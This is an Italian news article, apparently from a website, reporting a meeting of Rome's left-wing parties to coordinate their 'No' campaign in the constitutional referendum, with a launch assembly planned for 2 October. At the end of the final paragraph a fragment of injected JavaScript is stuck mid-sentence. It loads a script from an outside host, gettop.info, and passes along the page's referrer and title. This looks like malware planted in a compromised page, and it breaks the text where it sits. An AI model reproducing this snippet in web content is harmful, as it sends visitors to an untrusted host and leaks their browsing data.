image

LA SINISTRA ROMANA SI UNISCE NELLA LOTTA REFERENDARIA

La sinistra a Roma​ s​​i organizza​ e nel prossimo autunno si ritroverà ancora una volta unita, dopo la campagna elettorale per le amministrative di giugno, per far sentire forte il proprio “​​NO​” alla proposta di modifica della Costituzione Italiana. ​I​​​eri​ pomeriggio nella sede dell’Altra Europa con Tsipras Roma, in via Sant’Ambrogio 4, i soggetti che hanno dato vita a Sinistra per Roma, che ha portato all’elezione in consiglio comunale di Stefano Fassina, si sono ritrovati per pianificare la migliore strategia per un’azione sinergica nella campagna referendaria per il ‘NO’.

Un’iniziativa pensata affinché la voce della sinistra arrivi chiara, forte e unita. Oltre a Ferruccio Nobili, portavoce romano di Aet, che ha convocato l’incontro, si sono ritrovati intorno al tavolo, Marco Possanzini (Si – Sel), Michele Dau (Sinistra per Roma), Floriana D’Elia (Futuro a sinistra), Vito Meloni (Prc), Roberto Vallocchia (PCdI), David Tozzo (Possibile), Gianni ​Principe (Contaci).

​”In autunno – ha sottolineato Ferruccio Nobili, spiegando i motivi della convocazione - ci attende una sfida decisiva per il futuro della democrazia ​e d​el nostro Paese: quella del referendum costituzionale. Tutti noi siamo già impegnati nei comitati unitari. Ci è sembrato​ però​ utile ​ un momento di confronto per discutere su come​ ​coordinare ​​al meglio i nostri sforzi per ​contribuire a conquistare nel referendum la maggioranza dei voti. Naturalmente i temi della campagna sono già indicati dal ‘Comitato per il no’ che accoglie tutte quelle forze politiche, associative e di movimento che si oppongono alla controriforma renziana e, fortunatamente, sono soggetti non tutti riconducibili alla sinistra. Riteniamo quindi necessario, utile e positivo che nella campagna elettorale si senta forte anche il punto di vista della Sinistra, perché noi siamo le forze costituzionali per eccellenza e abbiamo un legame profondo con chi la Costituzione l’ha voluta e combatte per farla vivere giorno per giorno”.

Alla fine dell’inconto unanime è stata la decisione di avviare un percorso comune ​che partirà con un assemblea cittadina di lancio della campagna elettorale da svolgersi il prossimo 2 ottobre all’interno della festa di Sinistra per Roma (che si svolgerà nei giorni 1 e 2 ottobre presso il Centro Sociale Brancaleone a Montesacro). Successivamente verranno pianificati anche alcuni eventi, incentrati su iniziative di strada e con contenuti specifici, che saranno il nostro contributo autonomo nella campagna: “un No per cambiare”. L’obiettivo è quello di continuare ad impegnarci dentro i comitati per il ‘No’ che esistono già in città aggiungendo nostre specifiche iniziative che facciano emergere una proposta e una visibilità di sinistra. Per questo nei prossimi giorni si riunirà un gruppo di lavoro, formato da tutte le forze presenti alla riunione di ieri, che si occuperà di pianificare tutte le attività e far emergere un documento politico, che sarà discusso e licenziato nella assemblea del 2 ottobre, e che rappresenterà il punto di vista della sinistra sulle motivazioni del “NO” al referendum.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; } else {

Lascia un Commento

L'indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati *

È possibile utilizzare questi tag ed attributi XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>